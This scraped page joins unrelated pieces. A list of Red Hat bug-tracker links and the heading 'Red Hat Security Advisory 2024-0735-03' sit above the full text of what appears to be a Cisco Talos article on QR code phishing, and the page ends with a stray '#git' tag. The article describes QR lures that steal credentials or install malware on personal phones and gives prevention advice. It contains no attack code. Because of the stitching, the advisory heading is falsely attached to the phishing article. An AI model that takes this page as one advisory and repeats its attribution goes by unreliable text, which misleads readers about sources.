https://bugzilla.redhat.com/show_bug.cgi?id=2045014  
https://bugzilla.redhat.com/show_bug.cgi?id=2258143  
https://bugzilla.redhat.com/show_bug.cgi?id=2258165  
https://issues.redhat.com/browse/OCPBUGS-20180  
https://issues.redhat.com/browse/OCPBUGS-20547  
https://issues.redhat.com/browse/OCPBUGS-26526  
https://issues.redhat.com/browse/OCPBUGS-26527  
https://issues.redhat.com/browse/OCPBUGS-27072  
https://issues.redhat.com/browse/OCPBUGS-27157  
https://issues.redhat.com/browse/OCPBUGS-27419  
https://issues.redhat.com/browse/OCPBUGS-27773  
https://issues.redhat.com/browse/OCPBUGS-28238  
https://issues.redhat.com/browse/OCPBUGS-28379  
https://issues.redhat.com/browse/OCPBUGS-28384  
https://issues.redhat.com/browse/OCPBUGS-28789  
https://issues.redhat.com/browse/OCPBUGS-28823  
https://issues.redhat.com/browse/OCPBUGS-28871  
https://issues.redhat.com/browse/OCPBUGS-28949  
https://issues.redhat.com/browse/OCPBUGS-28950  
https://issues.redhat.com/browse/OCPBUGS-28951  
https://issues.redhat.com/browse/OCPBUGS-28952  
https://issues.redhat.com/browse/OCPBUGS-28957  
https://issues.redhat.com/browse/OCPBUGS-29030  
https://issues.redhat.com/browse/OCPBUGS-29034  
https://issues.redhat.com/browse/OCPBUGS-7262

Red Hat Security Advisory 2024-0735-03

QR code attacks are particularly dangerous because they move the attack vector off a protected computer and onto the target’s personal mobile device, which usually has fewer security protections in place and ultimately has the sensitive information that attackers are after.

Wednesday, February 14, 2024 08:00

Though QR codes were once on the verge of extinction, many consumers are used to seeing them in the wild for ordering at restaurants, or as mainstays on storefront doors informing customers how they can sign up for a newsletter or score a sweet deal. 

The use of QR codes saw a resurgence during the COVID-19 pandemic as a non-contact way for consumers to obtain important information. And as they’ve become more prevalent, attackers have taken notice, too, increasingly deploying them in phishing and email-based attacks. 

There was a significant increase in QR code phishing in 2023, according to public reporting and recently collected data from Cisco Talos Incident Response (Talos IR).  

As highlighted in our latest Quarterly Trends report, Talos IR responded to a QR code phishing campaign for the first time in an engagement in the fourth quarter of 2023, where threat actors tricked victims into scanning malicious QR codes embedded in phishing emails with their personal mobile devices, thereby leading to malware being executed on the mobile devices.  

In a separate attack, the adversaries sent targets spear-phishing emails with malicious QR codes pointing to fake Microsoft Office 365 login pages that eventually steal the user’s login credentials when entered.  

QR code attacks are particularly dangerous because they move the attack vector off a protected computer and onto the target’s personal mobile device, which usually has fewer security protections in place and ultimately has the sensitive information that attackers are after. 

**How is a QR code lure different from a traditional malicious attachment or link? **

“Traditional” phishing attacks usually involve an adversary writing a highly targeted email hoping to trick a user into opening a malicious attachment or link that points to an attacker-controlled page. 

Phishing emails, such as business email compromise, are usually meant to impersonate an individual or organization the target is familiar with and willing to open something like a Microsoft Word document or URL that they would normally trust.  

These are typically links included in the body of an email, hyperlinked to a few words of text, or attachments to the emails with text prompting the user to open the attachment. 

In the case of QR code attacks, the adversary embeds a QR code in the body of the phishing email and asks the target to scan it with a mobile device to open a specific attachment or web link. As with any other QR code, the target would have to use a QR code-scanning app on their mobile device or the built-in scanning functions on native camera apps to open the requested link.  

What’s on the end of these QR codes varies greatly. Attackers could use the QR code to point to an attacker-controlled web page that looks like a legitimate login page, but instead steals the user’s credentials when they go to log in. Or it can lead to a malicious attachment that eventually installs malware on the target’s device.  

**What makes the use of QR codes in attacks so dangerous? **

Many corporate-owned computers and devices will have built-in security tools designed to detect phishing and preventing users from opening malicious links. However, when a personal device is introduced to the equation, these tools are no longer effective.  

When the target uses their personal device to scan a malicious QR code, the attack surface shifts, as enterprise security protocols and monitoring systems have less control and visibility over personal devices. And not all email security solutions can detect malicious QR codes like they would with malicious email attachments.  

With remote work expanding after the COVID-19 pandemic, more employees are accessing business information from their mobile devices, making these attacks more likely. According to the 2023 Not (Cyber) Safe for Work Report, which is a quantitative survey performed by the cybersecurity firm Agency, 97 percent of respondents access their work accounts from their personal devices. This potentially exposes sensitive business information in QR code attacks, should adversaries be able to capture internal login credentials or downloaded files on the targeted device.  

**Prevention **

To defend against QR code-based phishing attacks, users and organizations should follow several pieces of advice: 

*   Talos recommends organizations deploy a mobile device management (MDM) platform or similar mobile security tool, such as Cisco Umbrella, to all unmanaged mobile devices that have access to business information. Cisco Umbrella’s DNS-layer security is available for personal Android and iOS devices, which provides defenders with additional visibility while protecting the privacy of mobile device owners. 
*   User education is at the core of preventing QR code-based phishing attacks. Executives and defenders should ensure all employees are educated on the dangers of phishing attacks and adversaries’ increasing use of QR codes in malicious emails. 
    *   Malicious QR codes may have a poor image quality or look blurry when embedded in an email. This could be an initial sign that the QR code is not legitimate. 
    *   QR code scanners will often provide a preview of the link the code is pointing to. Inform users that they should only be visiting trusted web pages with URLs they recognize. Alternatively, they could use their managed device to manually type in the desired destination URL instead of using the QR code as a navigation method. 
    *   Look for common red flags in phishing emails, such as typosquatted email addresses and typos or grammatical errors in the body text of the email. 
    *   Never give out personal information unless you’ve confirmed the legitimacy of a QR code with the organization in question. 
*   Using multi-factor authentication protocols such as Cisco Duo can prevent credential stealing, which often provides threat actors with an initial foothold into targeted systems to send more convincing phishing emails from trusted business associates or teammates.

Tag

#git